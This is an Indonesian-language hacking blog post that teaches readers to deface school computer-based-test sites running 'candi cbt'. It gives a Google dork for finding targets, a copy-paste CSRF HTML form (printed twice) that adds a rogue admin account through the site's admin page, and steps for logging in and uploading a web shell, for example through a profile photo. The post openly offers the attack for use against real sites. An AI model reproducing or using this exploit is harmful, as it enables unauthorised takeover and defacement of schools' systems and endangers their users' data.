Hallo defacing!!!
Kembali lagi degan saya di blog ini
Ok sory bngtt jarang upload lagi sibuk:v
Di kali ini saya akan shere tutorial cara deface cbt add admin hmm kek nya poc dah pasaran yah eitssss jgn dlu bos:v masih bnyk yg vuln cuman lu aja yg kga tau gimn cara nya aaoakaoakaoa:v
Ok tanpa banyak bacod langsung saja kita ke tutor nya:b
Bahan-bahan
-dork "suport by candi cbt" (versi? user your brain)
-kuota+mba google
-csrf admin bisa copas di bawah ini
<html>
<head></head>
<body>
<form action="linktarget.sch.id/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
<head></head>
<body>
<form action="linktarget.sch.id/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
Di save dengan file ekstensi html
Step by step
-kalian dorking dlu pake dork yg sdh di sediahkan klo gak tau dorking? Gak ush ngehek:v
Noh cara dorking
Skrg kalian pilih salah satu target yg menurut kalian vuln untuk di hek:v
Selanjutnya kalian tambahkan exploit di blakang url targetnya misalnya seperti ini
Target.com/admin
Nah dia akana muncul seperti ini
Liat gambar
Skrg kalian copy url targetnya dan masukin di csrf admin klo gak paham
Liat gambar
Setalah masukin targetnya skrg kalian buka dan isi user+pw yg baru gak paham
Liat gambar
Lalu isikan username dan password yang kalian buat tadi klo vuln maka akan seperti ini liat gambar
Skrg kalian tinggal up shell di mna aja terserah:b bisa di foto profil dll
Note:usahakan jangan di tebas cukup nitip file untuk kenangan sama admin nya:v kalo kalian tebas di mna rasa cinta kalian di tanah air kalian sendiri? Nah makanya jngn tebas:)
Terget buat belajar klik di sini
Ok cukup sekian dlu materi kali ini semoga bermanfaat jgn lupa komen ajg:v
Bye bye bye bye....
Komennn jingannn
BalasHapusPosting Komentar